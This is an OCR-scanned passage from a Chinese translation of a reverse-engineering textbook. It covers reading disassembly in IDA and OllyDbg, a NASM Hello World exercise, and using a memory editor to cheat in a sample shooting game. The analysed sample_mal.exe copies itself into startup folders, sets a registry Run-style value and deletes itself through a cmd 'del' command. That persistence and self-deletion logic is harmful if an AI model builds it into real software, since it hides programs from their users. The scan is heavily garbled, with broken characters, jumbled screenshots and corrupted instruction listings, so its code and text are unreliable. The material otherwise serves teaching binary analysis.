下 面 我 们 再 来 看 一 下 wsample01b.exe 的 汇编 代码 。 




















这 个 示例 我 们 是 用 来 进行 动态 分 析 的 ， 因 此 没有 在 IDA FELT 








反 汇 编 代码 ， 现 在 





























| 查看 过 


我 把 代码 贴 在 下 面 给 大 家 看 一 看 。 简 单 观 察 这 段 代 











码 ， 大 家 能 不 能 在 


Y wsample01b.exe 


00401000 cpy 





脑海 中 联想 出 相应 的 C 语言 源 代码 呢 ? 


00401000 ExistingFileName- word ptr -2004h 
00401000 NewFileName - word ptr -1004h 


00401000 var 4 
00401000 
00401000 push 
00401001 mov 
00401003 mov 
00401008 call 
0040100D mov 
00401012 xor 
00401014 mov 
00401017 push 
0040101C lea 
00401022 push 
00401023 push 
00401025 call 
0040102B lea 
00401031 push 
00401032 push 
00401034 push 
00401036 push 


- dword ptr -4 


ebp 

ebp, esp 

eax, 2004h 

_chkstk 

eax, X security cookie 
eax, ebp 

[ebp+var 4], eax 

1000h ; nSize 
eax, [ebp+ExistingFileName] 


eax ; lpFilename 
0 ; hModule 
GetModuleFileNameW 


ecx, [ebp+NewFileName] 
ecx 

0 

0 

T 





























jus 
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00401038 push 0 

0040103A call SHGetFolderPathW 

00401040 push offset String2 ; "\\wsample01b.exe" 
00401045 lea edx, [ebp+NewFileName] 

0040104B push edx ; lpstringl 

0040104C call lstrcatW 

00401052 push 0 ; bFaillfExists 
00401054 lea eax, [ebp+NewFileName] 

0040105A push eax ; lpNewFileName 
0040105B lea ecx, [ebp+ExistingFileName] 

00401061 push ox ; lpExistingFileName 
00401062 call CopyFileW 

00401068 mov ecx, [ebp-var 4] 

0040106B xor ecx, ebp 

0040106D xor eax, eax 

0040106F call security check cookie 

00401074 mov esp, ebp 

00401076 pop ebp 


00401077 retn 
00401077 cpy endp 
00401077 

00401080 wWinMain 
00401080 call cpy 


00401085 push 0 ; uType 
00401087 push offset Caption ; "MESSAGE" 
0040108C push offset Text AA Copredlii 
00401091 call GetActiveWindow 

00401097 push eax ; hWnd 
00401098 call MessageBoxW 

0040109E xor eax, eax 


004010A0 retn 10h 
004010A0 wWinMain endp 


感觉 如 何 ? 
由 于 wsample01b.exe 中 有 很 多 函数 调用 ， 因 此 只 要 理解 了 push 和 
call 的 性 质 应 该 就 能 够 看 懂 大 部 分 逻辑 了 o 

在 cpy 函数 开头 的 ExistingFileName, NewFileName, var 4 都 是 函数 
使 用 的 局 部 变量 。lea eax, [ebp+ExistingFileName] 中 ExistingFileName 的 前 
看 有 一 个 ebp+， 这 个 请 大 家 和 暂 日 忽略 ， 只 要 理解 为 “将 ExistingFileName 
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的 地 址 存放 到 eax” 就 可 以 了 。 
写成 C 语言 的 话 应 该 是 下 面 这 个 样子 。 


char ExistingFileName [2048]; 
eax - ExistingFileName; 


到 这 里 ， 相 信 大 家 已 经 能 够 看 懂 wsample0la.exe 和 wsample01b.exe 
中 大 约 七 八成 的 汇编 代码 了 ， 对 于 理解 程序 的 大 臻 逻辑 来 说 已 经 足够 了 。 























制 代码 





i 
EE: " 
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1.5 通过 汇编 指令 洞察 程序 行为 


1.5.1 给 函数 设置 断 点 
在 本 章 的 开头 我 们 已 经 对 sample mal.exe i gs 在 本 章 最 





























后 ， 我 们 来 运用 本 章 所 学 的 知识 重新 分 析 一 下 这 个 程序 ， 通 过 汇编 指令 
来 洞察 程序 的 行为 。 
首先 用 OllyDbg 打开 sample_mal.exe， 然 后 在 反 汇编 窗口 中 点 击 右 





键 ， 在 菜单 中 选择 Search for 一 Name in all modules。 

EPE, 从 显示 出 的 函数 列表 中 找到 类 型 为 Export 的 RegSetValueExA 
函数 。OllyDbg 支持 通过 键盘 来 快速 查找 ， 只 要 输入 RegSetVa... 就 可 以 
速 定 位 到 目标 函数 了 。 























* 


函数 列表 窗口 
a All names 


ADURPTS? . gRestoreKeyA 

ADVAPI32 RegRestoreKeylil 

RDURPI32| . RegSaveKeyA 

ADVAPISZ|. RegSavekeyExA 

RBDURPI32|. RegSavekeyExli! 

ADVAPI32 RegSavekeyli! 

RBDURPIS2|. RegSetKeySecurity 

SHELL32 |. ADVAPIS2.RegSetKeySecurity 

RDURPI32 RegSetValueA 

SHLWAPI |. RDURP RegSetValueA 

66462606 sample m|. I D0) RDURPI32.Re， si 

77DSERD7 I | Export ReaSetUalu 

77E3102C RPCRT4 PI ReseerUalucesA 
SHLWAPI : 

IMMH32 

comet L32 

RDURPI32| . 

ReaSetUa LueEuli 

U ReaSetUa lueExly 

70561010 SHELL32 I JAP RegSet Va luecExl 














双击 函数 名 就 会 跳 转 到 该 函数 的 开头 ， 接 下 来 我 们 在 下 列 函 数 的 位 
置 处 设置 断 点 。 








e RegSetValueExA 
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* RegCloseKey 
* RegCreateKeyExA 
* CopyFileA 





IT 











上 上 面 的 目标 函数 都 各 有 两 种 类 型 : 一 种 是 Export ; 另 一 种 是 Importo 
请 大 家 在 类 型 为 Export 的 函数 上 双击 并 设置 断 点 。 
RegSetValueExA , RegCloseKey, RegCreateKeyExA 位 于 ADVAPI32 
模块 中 ， 而 CopyFileA 位 于 kernel32 模块 中 。 
按 F9 运行 sample malexe， 程 序 会 在 断 点 处 暂停 运行 。 
按 Ctrl+F9 (运行 至 Return 处 ) 或 者 按 Alt-F9 (运行 至 用 户 代 码 
Ab), 程序 会 继续 运行 到 函数 返回 的 地 方 。 


Y CopyFileA 函数 返回 的 地 方 





OllyDbg — sample mal.exe — [CPU - main thread, module sample ml 









[c] File View Debug Plugins Üptions Window Help 
ELE Tf LIT ILLI BBR Ix|s]n]--s] Ray 


PALL est <&SHELL32. SHGet SpecialFolderPathA> 

MOV EDI, DWORD PTR DS: C<&KERNELS2. 1strcal kernel32.lstrcatH 

| 68 84214909 | PUSH sample m.00402194 StringToAdd = "\@.exe” 
805424 54 Ear En NODD PTR SS: CESP+54] 


FFD? CRLL EDI Istrcath 

. 8B1D 18264900) MOU EBX,DWORD PTR DS: LX&KERNELS2.CopyFi| kernel32. Bop lU teh 
6A a8 PUSH à FaillfExists LSE 
804424 54 LEA EAX, DWORD PTR SS:[ESP+54] 


. SD8C24 580400 LEA ECX, DWORD PTR SS: LESP*4581 
51 PUSH ECX Exist ingFi leName 


: FFDS CRLL EBX CopyFile 












ing 






NewF i lel 
















. 6A 05 PUSH 5 
. 8D5424 58 LER EDX, DWORD PTR SS:LESP4581 






[c] File View Debug Plugins Options Window Help 
aux play wisi £4] s sj ewa] c| eefe] lH 
00401 : EM F8 E SHEAR PTR SS: [EBP-8] 


00401 
. ROR ESI,E 
856 FC TM Ec Bioro PTR SS: CEBP-4] 











pDisposition 













pHandle 


y => NULL 
KEV. RLL. .RCCESS 
> REG. OPTION NON VOLRTILE 






56 PUS H EST 
. 68 SFaearea araaesr 
56 PI ESI 
sample m.884821R4 
ESI 日 
sample_m. 004021CC = "Software*Microsoftllindows 
USH SaBaaaa2 HKEY_LOCAL_MACHINE 
MOV DWORD PTR SS: CEBP-4],ESI 
CALL DWORD PTR DS: C<&ADVAPI32. RegCreatel LReaCresteKeyExA 


EAX, 
JNZ SHORT sample m, 00401370 
noy EDX, DWORD PTR SS: LEBP*C1 
MOU EAX, DWORD PTR SS:LEBP*481 
MOU ECX, DWORD PTR SS: [EBP-4] 
PUSH EDX [2 






20481 
90401 
60401 









ao . 58 PUSH ERX Buff 
86481358|| . PUSH 1 UalueTupe = REG S2 
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请 大 家 看 一 下 调用 各 函数 附近 的 代码 ， 就 能 够 看 明白 程序 是 如 何 进 


行 复制 文件 、 写 入 注册 表 等 操作 的 了 。 








51% ”通过 逆向 了 
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i 
此 





1.5.2 反 汇 编 并 观察 重要 逻辑 


接 下 来 我 们 用 IDA 打开 sample malexe， 看 看 一 些 重要 的 程序 逻辑 。 

















首先 来 看 复制 0.exe 和 T.exe 的 地 方 。 


Y sample mal.exe 


Mex 
CERE: 
CERE: 
„text: 
CORE: 
text: 
exi 
CERE: 
:004013E0 


Pies 


CORE: 
CORE: 
Cex: 
PCERE: 
text: 
"sex 
CORE: 
text: 
:004013FB 


SCORE 


CERE: 
Miser 
CORE: 
CORE: 
text: 
PCERE: 
text: 
text: 
SCORES 
exits 
CERE: 


004013C2 
004013C7 
004013CE 
004013CF 
004013D0 
004013D6 
004013DC 
004013DE 


004013E4 
004013E5 
004013E7 
004013E9 
004013EF 
004013F4 
004013F8 
004013F9 


00401401 
00401403 
00401407 
00401408 
0040140F 
00401410 
00401412 
00401414 
00401416 
0040141A 
0040141B 





400h ; nSize 

eax, [esp+85Ch+ExistingFileName] 
eax ; lpFilename 
ecx ; hModule 


ds: imp GetModuleFileNameA@12 
esi, ds: imp  SHGetSpecialFolderPathA016 


0 ; fCreate 
7 ; nFolder 
ecx, [esp+860h+Data] 

(obs ; lpszPath 
0 ; hwndOwner 


esi ; SHGetSpecialFolderPathaA (x,x,x,x) 
edi, ds: imp  lstrcatAo8 


offset String2 ; "\\0.exe" 

edx, [esp«85Ch«Data] 

edx ; lpStringi 

edi ; lstrcatA(x,x) ; lstrcatA(x,x) 


ebx, ds: imp  CopyFileAe12 

0 ; bFailIfExists 
eax, [esp«85Ch«Data] 

eax ; lpNewFileName 
ecx, [esp+860h+ExistingFileName] 

ecx ; lpExistingFileName 
ebx ; CopyFileA(x,x,x) 


0 ; fCreate 
5 ; nFolder 
edx, [esp+860h+Data] 

edx ; lpszPath 
0 ; hwndOwner 
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.text:0040141D call esi ; SHGetSpecialFolderPathA (x,x,x,x) 





.text:0040141F push offset al exe ; "\\l.exe" 
.text:00401424 lea eax, [esp+85Ch+Data 

.text:00401428 push eax ; lpStringl 
.text:00401429 call edi ; lstrcatA(x,x}) 7 lstrcatā(x,x) 
.text:0040142B push 0 ; bFaillfExists 
.text:0040142D ea ecx, [esp«85Ch«Data 

.text:00401431 push eax ; lpNewFileName 
.text:00401432 ea edx, [esp+860h+ExistingFileName] 
.text:00401439 push edx ; lpExistingFileName 
.text:0040143A call ebx ; CopyFileA(x,x,x) 
.text:0040143C ea eax, [esp+858h+Data 

.text:00401440 ea edx, [eax«1 








.text:00401443 
.text:00401443 loc 401443: 











.text:00401443 mov cl, [eax] 
.text:00401445 inc eax 
.text:00401446 test cl (el 
.text:00401448 jnz short loc 401443 
.text:0040144A sub eax, edx 
.text:0040144C push eax ; cbData 
.text:0040144D lea eax, [esp«85Ch«Data] 
.text:00401451 push eax ; lpData 
.text:00401452 call SetRegValue 
.text:00401457 add esp, 8 
.text:0040145A call SelfDelete 
.text:0040145F push 0 ; nExitCode 
.text:00401461 call ds: imp  PostQuitMessage04 
.text:00401467  jmp loc 40151F 

IDA 会 显示 出 调用 的 函数 名 和 参数 ， 是 不 是 十 分 易 懂 呢 ?此 外 ， 这 











些 代码 基本 上 就 是 由 push. call, move, lea 等 基本 指令 构成 的 ， 作 为 汇 
编 代码 来 说 也 是 比较 易 懂 的 。 

请 大 家 注意 最 后 00401452 处 的 SetRegValue 函数 以 及 0040145A 处 
的 SelfDelete 函数 ， 它 们 分 别 用 来 设置 注册 表 值 以 及 将 自身 删除 ， 下 卫 
我 们 分 别 来 看 一 下 。 
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V sample mal.exe ( SetRegValue ) 


.text:00401310 ; int . cdecl SetRegValue(BYTE *lpData,DWORD cbData) 


.text:00401310 SetRegValue proc near 
.text:00401310 
.text:00401310 dwDisposition = dword ptr -8 


I 


.text:00401310 hKey 
.text:00401310 lpData dword ptr 8 
.text:00401310 cbData = dword ptr OCh 
.text:00401310 


dword ptr -4 





.text:00401310 push ebp 

.text:00401311 mov ebp esp 

.text:00401313 sub esp, 8 

.text:00401316 push esi 

.text:00401317 lea eax, [ebp+dwDisposition] 
.text:0040131A push eax ; lpdwDisposition 
.text:0040131B xor esi, esi 

.text:0040131D lea ecx, [ebp+hKey] 

.text:00401320 push ecx ; phkResult 
.text:00401321 push esi ; lpSecurityAttributes 
.text:00401322 push 0F003Fh ; SamDesired 
.text:00401327 push esi ; dwOptions 
.text:00401328 push offset Class ; lpClass 
.text:0040132D push esi ; Reserved 
.text:0040132E push offset SubKey ; 
"Software\\Microsoft\\Windows\\CurrentVersi"... 
.text:00401333 push 80000002h ; hKey 
.text:00401338 mov [ebp+hKey], esi 


.text:0040133B call ds: imp  RegCreateKeyExA936 
.text:00401341 test eax, eax 


.text:00401343 jnz short loc 401370 
.text:00401345 mov edx, [ebp+cbData] 
.text:00401348 mov eax, [ebp+lpData] 
.text:0040134B mov ecx, [ebp+hKey] 
.text:0040134E push edx ; cbData 
.text:0040134F push eax ; lpData 
.text:00401350 push i ; dwType 
.text:00401352 push esi ; Reserved 
.text:00401353 push offset ValueName ; "sample mal" 
.text:00401358 push ecx ; hKey 
.text:00401359 call ds: imp  RegSetValueExA0924 
.text:0040135F test eax, eax 


.text:00401361 jnz short loc 401366 


SCOE 


Mie 


.tex 


EEE 


eX 


.text 


.text 


Meo 


.text 


x 


Mise 


.text 


Meo 


Meo 


EOE 
.text 


Meo 


.text 


Meo 


deo 


.text 


Mise 


.text 


.text 


Meo 


c ESSE 


iex 


Mises 


o E SERE 


.tex 


“tex 


.text 


Mise 
.tex 
.tex 


Meo 


Meo 





1.5 通过 汇编 指令 洞察 程序 行为 


:00401363 lea esi, [eax41 
:00401366 
:00401366 loc 401366: 
:00401366 mov edx, [ebp+hKey] 
:00401369 push edx ; hKey 
:0040136A call ds: imp  RegCloseKeyoe4 
:00401370 
:00401370 loc 401370: 
:00401370 mov eax, esi 
:00401372 pop esi 
:00401373 mov esp, ebp 
:00401375 pop ebp 
:00401376 retn 
V sample mal.exe ( SelfDelete ) 
:00401220 SelfDelete proc near 
:00401220 
:00401220 Parameters - byte ptr -20Ch 
:00401220 File = byte ptr -108h 
:00401220 var 4 - dword ptr -4 
:00401220 
:00401220 push ebp 
:00401221 mov ebp, esp 
:00401223 sub esp, 20Ch ; lpStringl 
:00401229 mov eax, X security cookie 
:0040122E xor eax, ebp 
:00401230 mov [ebp+var 4], eax 
700401233 push 104h ; nSize 
700401238 lea eax, [ebp+File] 
:0040123E push eax ; lpFilename 
:0040123F push 0 ; hModule 
200401241 call ds:__imp__GetModuleFileNameA@12 
200401247 test Gabe, eax 
700401249 jz loc 4012F3 
:0040124F push 104h ; cchBuffer 
t:00401254 lea ecx, [ebp+File] 
t:0040125A push ecx ; lpszShortPath 
:0040125B mov edx, ecx 
:0040125D push edx ; lpszLongPath 
:0040125E call ds:__imp__Get Short PathNameA@12 


. tex 
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:00401264 
:00401266 
:0040126C 
:0040126D 
:00401272 
:00401278 
:00401279 
:0040127F 
:00401285 
:0040128B 
:0040128C 
:00401292 
:00401293 
:00401295 
:0040129A 
:004012A0 
:004012A1 
:004012A3 
:004012A8 
:004012AE 
:004012AF 
:004012B4 
:004012BA 
:004012BB 
:004012BD 
:004012BF 
:004012C1 
:004012C3 
:004012C9 
:004012CA 
:004012D0 
:004012D1 
:004012D3 
:004012D5 
:004012DB 
:004012DE 
:004012E0 
:004012E5 
:004012E8 
:004012EA 
:004012EF 
:004012F1 


613: ”通过 逆向 了 


test 
JZ 
push 
push 
lea 
push 
call 
mov 
lea 
push 
lea 
push 
call 
push 
lea 
push 
call 
push 
lea 
push 
push 
call 
pop 
test 
KI: 
push 
push 
lea 
push 
lea 
push 
push 
push 
call 
cmp 
jle 
mov 
mov 
xor 
call 
mov 


pop 
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eax, eax 
loc 4012F3 

esi 

offset aCDel ; Woe del " 
eax, [ebp+Parameters] 

eax ; lpStringil 
ds: imp  lstrcpyAe8 

esi, ds:__imp__lstrcatA@8 
ecx, [ebp+File] 





ecx ; lpString2 

edx, [ebp+Parameters] 

edx "epson 

esi ; lstrcatA(x,x) ; lstrcatA(x,x) 
offset aNul p UU NU 

eax, [ebp+Parameters] 

eax ; lpStringl 

esi ; lstrceatA (x, x) LSECCat (x, x) 
104h ; nSize 

ecx, [ebp+File] 

X ; lpBuffer 

offset Name i "ComSpec" 


ds:__imp__GetEnvironmentVariableA@12 


esi 

eax, eax 

short loc_4012F3 

0 ; nShowCmd 

0 ; lpDirectory 


edx, [ebp+Parameters] 
edx ; lpParameters 


eax, [ebp+File] 


eax ; lpFile 

0 ; lpOperation 
0 ; hwnd 

ds: imp  ShellExecuteAG24 
eax, 20h 

short loc 4012F3 

eax, 1 


ecx, [ebp+Vat 4] 
eca ebp 
security check cookie 





esp, ebp 
ebp 
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.text:004012F2 retn 
.text:004012F3 
.text:004012F3 loc 4012F3: 
.text:004012F3 mov ecx, [ebp-var 4] 
.text:004012F6 xor ecx, ebp 
.text:004012F8 xor eax, eax 
text:004012FA call Security check cookie 
.text:004012FF mov esp, ebp 
.text:00401301 pop ebp 
.text:00401302 retn 

大 家 看 了 这 些 汇编 代码 ， 能 不 能 大 概 联想 出 程序 的 逻辑 呢 ? 





在 本 章 最 后 一 下 子 贴 了 好 几 页 汇 多 























大 。 不 过 ， 如 果 你 已 


经 读 完 本 章 的 话 ， 


当然 ， 我 们 完全 没有 必要 逐条 指 
从 整体 上 理解 程序 究竟 做 了 哪些 操作 。 








汇编 语言 也 是 m A> 
阅读 别人 写 的 大 量 代 码 ， 
读 ， 剩 下 的 部 分 基 











就 好 了 。 
逆向 工程 也 是 





























一 样 ， 

















该 也 难 不 倒 你 了 





人 代码， 肯定 有 读者 会 觉得 很 头 
这 些 代码 应 
令 去 仔细 阅读 这 些 代 码 ， 重 要 的 是 
平常 大 家 也 不 会 去 一 行 一 行 地 仔细 
了 必须 要 理解 的 重要 部 分 花 时 间 仔 细 读 一 
oe 带 而 过 


只 要 大 体 上 理解 程序 在 做 什么 事 


“重要 的 部 分 花 时 间 仔 细 理 解 ” ”3 
知道 怎么 回 事 就 好 ”这 两 条 原则 同样 适用 。 
带 着 这 样 的 感觉 去 观察 二 进 制 的 世界 ， 是 不 是 








其 余部 分 大 概 


别有一番 乐趣 呢 ? 



























































































































































一 专栏 : 学 习 编 写 汇编 代码 

在 软件 分 析 中 ， 阅 读 汇编 代码 是 家 常 便 饭 ， 但 相对 地 ， 自 己 纺 
写 汇编 代码 的 机 会 并 不 多 。 

这 也 并 不 稀奇 ， 就 像 很 多 人 会 “ 读 ” 文 章 ， 但 却 不 会 “ 写 ” 文 
章 是 一 样 的 道理 。 恐 怕 所 有 的 日 本 人 都 能 够 阅读 用 日 语 写 的 小 说 ， 
但 反 过 来 是 不 是 所 有 的 日 本 人 都 会 写 小 说 呢 ? 答案 显然 是 否定 的 。 
编程 也 是 一 样 ， 阅 读 和 编写 所 需要 的 能 力 是 不 同 的 。 

Ain, “尽管 会 写 但 却 不 会 读 ” 这 样 的 事情 好 像 谁 都 没 听 说 过 。 
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的 情况 好 像 不 大 可 能 发 生 。 


TT 






































































































































NASM ， 连 接 器 是 ALINK。 





e NSAM 


http://www.nasm.us/ 


* ALINK 


http://alink.sourceforge.net/download.html 












































下 面 我 们 就 来 编写 一 个 显示 Hello World! 的 程序 吧 。 
请 大 家 将 文件 的 扩展 名 设置 为 asm。 
V hello32.asm 


extern MessageBoxA 


Section .text 
global main 


main: 
push dword 0 
push dword title 
push dword text 
push dword 0 
call MessageBoxA 
ret 


section .data 
title: db 
db 


'MessageBox', 0 


text: 'Hello World!', 0 


MessageBoxA 需要 以 下 4 个 参数 。 


。 父 窗口 句柄 





为 此 ， 笔 者 认为 “通过 写 可 以 同时 锻炼 读 和 写 两 方面 的 能 
力 "， 如 果 大 家 真 想 深入 学 习 汇 编 语 言 的 话 ， 实 际 动手 写 一 写 应 该 
是 很 有 帮助 的 。 

Windows 环境 中 的 汇编 器 有 很 多 ， 本 书 中 使 用 的 汇编 器 是 
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。 要 显示 的 消息 
要 显示 的 消息 框 标题 
要 显示 的 消息 框 类 型 





关于 API 的 详细 信息 ， 请 大 家 在 MSDN ( Microsoft Developer 
Network ) 上 搜索 。 








e MessageBox 
https://msdn.microsoft.com/en-us/library/windows/desktop/ 
ms645505.aspx 














ARE Windows API 并 不 是 汇编 语言 的 本 质 部 分 ， 但 我 们 现在 在 
Windows 环境 下 进行 测试 ， 因 此 不 可 避免 地 要 使 用 Windows API, 
大 家 知道 去 哪里 查询 相关 信息 就 可 以 了 。 

我 们 现在 只 需要 显示 一 个 简单 的 消息 框 ， 因 此 第 1、4 个 参数 用 
0 就 可 以 了 。 

函数 的 调用 过 程 如 下 。 






























































































































































e 要 显示 的 消息 : Hello World! 

要 显示 的 消息 框 标题 : MessageBox 
。 将 参数 按照 从 后 往 前 的 顺序 入 材 
e 用 call MessageBoxA 调用 函数 





下 面 我 们 来 运行 看 看 。 

首先 ， 用 NASM 加 上 -fwin32 参数 将 代码 汇编 为 .obj 文件 。 
然后 ， 用 ALINK 生成 可 执行 文件 。 

成 功 生成 可 执行 文件 后 ， 屏 幕 上 应 该 会 显示 Generating PE file 


hello32.exe。 






























































v 运行 示例 


C:\>nasm -fwin32 hello32.asm 

C:\>alink -oPE hello32 win32.lib -entry main 
省 略 

Generating PE file hello32.exe 
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可 执行 文件 生成 之 后 ， 直 接 双 击 它 就 可 以 运行 了 ， 这 时 屏幕 上 
应 该 会 显示 出 一 个 写 着 Hello World! 的 消息 框 。 



































Y Fi OllyDbg 打开 hello32.exe 


(文本 区 域 


OllyDbg - hello32.exe - [CPU — main thread, module hello32] 
[C] Fite View Debug Plugins Options Window Help 
ES a Ee 
PU: hel lo32. 00402000 
Pos hel lo32. 00402008 
CAL €JMP. &user32,MessageBonA> 














section .text 
global main 
main: 


push dword 0 
push dword title 
push dword text 
push dword 0 
call MessageBoxA 
ret 


section .data 
title: db ' MessageBox’, 0 
text: db 'Hello World!', 0 


下 面 我 们 用 OllyDbg 来 打开 刚刚 生成 的 hello32.exe， 打 开 后 各 
窗口 会 显示 以 下 信息 。 















































e 左上 方 的 反 汇 编 窗口 : 显示 刚刚 我 们 编写 的 汇编 指令 
e 左下 方 的 内 存 窗口 : 显示 section data 之 后 存放 的 数据 


当 逐 一 执行 这 些 指 令 时 ， 每 执行 一 次 push 指令 ， 右 下 方 的 栈 窗 
口中 就 会 显示 出 刚刚 入 栈 的 值 。 
最 后 ， 当 执行 call MessageBoxA 时 ， 屏 幕 上 就 会 显示 出 消息 
框 了 。 
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反 汇 编 器 、 调 试 器 这 些 工 具 ， 原 本 都 是 用 来 提高 查找 bug 的 效率 
的 ， 然 而 因为 它们 能 够 在 机 器 语言 层面 对 软件 进行 分 析 ， 因 此 也 被 用 来 
破解 软件 。 二 进 制 分 析 技 术 能 够 帮助 发 现 设计 时 所 没有 想到 的 问题 ， 另 
一 方面 也 能 够 用 来 进行 软件 破解 。 
“破解 ”( cracking ) 这 个 词 的 涵义 十 分 宽泛 ， 在 游戏 中 作 浆 也 可 以 算 
作 破 解 ， 例 如 在 网 络 游戏 中 修改 二 进 制 数据 (修改 内 存 ) 使 自己 无 敌 ， 
或 者 复制 稀有 道具 等 。 作 为 游戏 的 运营 方 ， 也 会 采取 对 策 防 止 这 些 行为 
的 发 生 ， 例 如 对 通信 进行 加 密 ， 以 及 尽量 将 数据 存储 在 服务 右上 等 。 

在 此 基础 上 ， 本 章 我 们 将 学 习 如 何 保护 软件 不 被 破解 。 
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2.1 解读 内 存 转 储 


2.1.1 射击 游戏 的 规则 


首先 我 们 来 看 一 个 示例 游戏 。 请 大 家 运行 chapO2 shooting 中 的 








shooting.exe。 


v 射击 游戏 


E shooting 


SCORE: 0029 ENERGY: 0000 





这 个 游戏 的 规则 如 下 。 


。 空格 键 : 射击 

。 $ë: 向 左 移动 

。 一 键 : 向 右 移动 

。 |: 填充 能 量 ( 以 当前 


前 得 分 为 上 限 ) 
e |$: 时 间 停 止 ( 消费 能 


4E 
F 
&) 
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用 左右 键 移动 ,用 空格 键 射 击 ， 这 些 操 作 和 一 般 的 射击 游戏 一 模 
一 样 。 
通过 按 上 下 键 可 以 使 用 能 够 让 时 间 停 止 的 特殊 能 

其 中 7 键 用 来 填充 能 量 ， | 键 则 用 来 消费 能 量 并 让 时 间 停 止 。 

能 量 的 上 限 是 当前 得 分 ， 因 此 随 着 游戏 的 进行 ， 能 够 填充 的 能 量 也 
会 增加 。 

击 中 敌人 可 以 增加 得 分 ， 被 敌人 击 中 则 减少 得 分 。 得 分 越 高 ， 敌 人 
越 强 ， 子 弹 的 追踪 性 能 也 会 提高 。 

首先 请 大 家 先 玩 玩 看 ， 一 般 来 说 能 玩 到 500 ~~ 1000 分 。 不 过 ， 当 超 
过 1000 分 之 后 ， 游 戏 难度 就 会 大 大 增加 ， 要 想 达 到 2000 分 可 以 说 是 相 
当 难 的 。 
























































2.1.2 ”修改 4 个 字 节 就 能 得 高 分 

得 2000 分 虽然 难 ， 但 其 实 我 们 只 要 修改 内 存 中 4 个 字 节 的 数据 就 
可 以 轻松 实现 了 。 
为 了 修改 内 存 数据 ,我们 在 这 里 要 用 到 有 万 能 进程 内 存 编辑 器 之 称 
的 工具 “ 免 耳 旋风 ” 。 















































。 免 耳 旋 风 
http://hp.vector.co.jp/authors/VA028 184/#TOOL 
http://www. vector.co.jp/soft/win95/prog/se375830.html 








在 运行 射击 游戏 的 同时 ， 打 开 免 耳 旋风 ， 然 后 从 进程 列表 中 选择 


Shooting.exe。 





D 原名 为 “了 攻 办 办 八 1 儿 一 > ”， 这 又 是 一 个 只 出 现在 日 本 的 软件 ， 它 也 只 有 日 
文 界面 ， 而 且 菜 单 在 中 文系 统 下 会 乱码 。 译 者 注 
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V 万 能 进程 内 存 编辑 器 一 一 免 耳 旋风 


UH Sa TU — 


|12 + >) & ees satin 


PORZBAR | +— ay Dstt | 4-292889 | 


UAEM | Paver Loro evt 
ZDt28 [RAE [tva-wi24 

shootinz.exe |00000154 [XPMUser@VIRTUALXP-10791 [EE [C:¥Doc 
@chrone.exe 00000188 XPMUser@VIRTUALXP-10791 通常 C:¥Documents « 
EAHidemaru.exe 00000194 XPMUser@VIRTUALXP-10791 通常 C:¥Program Fi 








jWCPksSrv.exe ^ 000009C8 XPMUser@VIRTUALXP-10791 i C:¥Program Fi |” 
€ chrone.exe 00000D3C XPMUser&VIRTUALXP-10791 i C:¥Documents 4 
EYCExpress.exe 000009F8 XPMUser@¥IRTUALXP-10791 i C:¥Program Fi 


idemaru.exe 00000810 XPMUser@VIRTUALSP-10791 i C:¥Program Fi 一 
ifllcon ine .exe 00000720 XPMUser&VIRTUALXP-10781 i C¥M INDOWS¥sys 
€ chrone.exe 000000C4 XPMUser&VIRTUALXP-10791 通常 上 C:¥Documents : 
EAHIDEMARU.EXE 00000914 XPMUser@VIRTUALXP-10791 i C:¥Program Fi 
[WPFFontCach... 00000458 LOCAL SERVICEeNT AUTHORITY i C¥WINDOWS¥M ic 
€ chrone.exe 00000E64 XPMUser&VIRTUALXP-107891 i C:¥Documents < 
回 als.exe 00000BAC LOCAL SERVICE@NT AUTHORITY i C¥HINDOWS¥Sy< 
Ewscntfy.exe  OO000B7C XPMUser@VIRTUALXP-10791 i C¥HINDOWS¥sys 
过 msnsgs.exe 00000820 = XPMUser@VIRTUALXP-10791 i C:¥Program Fi 

ctfmon.exe 000009FC XPMUser&VIRTUALXP-107891 i CHM INDOWS¥sys 
jusched .exe 000009F0 XPMUser@yIRTUALXP-10791 il C:¥Program Fi By 
< | > 


























我 们 先 来 确认 一 下 栈 地 址 ， 也 就 是 看 一 下 主线 程 的 ESP 寄存 带 值 。 
邮 点 击 菜单 中 的 “元 公分”( 调 试 ) > “ALY BRL DAY Ba” GE 
电 线程 显示 寄存 顺 值 )。 











V 按 线程 显示 寄存 器 值 


U ALS FRILY ARR 

rAbyF-E ——— 
又 Lyk 再 取得 LYRAS 一 一 一 

bo FID + ARENE LYZSRE 

F EAX [00000000 
Esx [77D0A340 — 
ECX pozera — — 
fox [C94E514 — 








EBP [DUIFCCO — 
Ew Fo — 
Eor Faizfo4 C 
Er e 


EFL [00000202 


WU om? me 
no om? me 


BARALy FERAT FS(32) |?FFDEOOO 





























选择 类 型 为 “通常 ”、 优 先 度 为 “8” 的 线程 ， 然 后 查看 ESP 的 值 。 
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ESP 的 值 在 每 个 环境 上 都 不 一 样 ， 因 此 请 大 家 按 自 己 环 境 的 值 来 
进行 后 续 操 作 。 笔 者 的 环境 中 ESP 的 值 为 0012FC74， 这 就 是 栈 地 址 











的 起 点 。 

由 于 当前 得 分 为 29， 因 此 我 们 先 搜索 一 下 栈 数 据 中 “29” 这 个 值 存 
放 在 哪里 。 

使 用 下 面 两 种 方式 中 的 任意 一 种 ， 都 可 以 打开 范围 检索 窗口 。 




















。 点 击 菜单 中 的 “检索 ”( 检索 ) "OCEUSSBIATSXELC.1 
索 ”( 指定 内 存 范围 检索 ) 
e 按 Alt+F 键 


V 范围 检索 窗口 





通常 "变动 检索 共通 : 
广 检索 ' 比较 单位 (ByteyFloat》 一 一 一 一 一 一 - RR: "ETE 
C1 C2 G4 C Float | FROG GREAT 








tea Lea CS a tb CEE) 一 一 一 一 一 一 | | e 


| [K] 现在 值 [<] EES 


JERR LE BATE ana F. Frits Be 1 63) 


c 数值 厂 2B | 


S UNICODE — 
Rats: [0012FC74 = BBE: [1000 HRE 


ERRUR MAE dg E — E Risma — — 

Frits: [00010000 Sef: [04000000 [v RR-A 

Pha FAX EU 
确保 " 记 轰 AR OE | 

ROMA ART RRA ESO TB 3R Te IB EE. 


fiin 值 增加 {ere 一 


FTE NSE 



































表示 件数 三 32000 
R EER THA Ma E ROI (By te, Word, DWord Float) 一 —— —— 


| B( 29, 29 ), W( 29, 29 ), D( 29, 29 ), F( 40637655e-044 ) 
| [B(29, 28 ), W( 29, 28 ), D( 29, 28 ), F( 406376556-044 》 

















在 对 话 框 中 进行 如 下 设置 。 
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o “REET - 比较 单位 ”( 检索 、 比 较 单位 ) : 4 字 节 
。“ 数 值 ”( 数值 ) : 29 

e “HIZ FL R” (EEHEHE ) : 0012FC74 

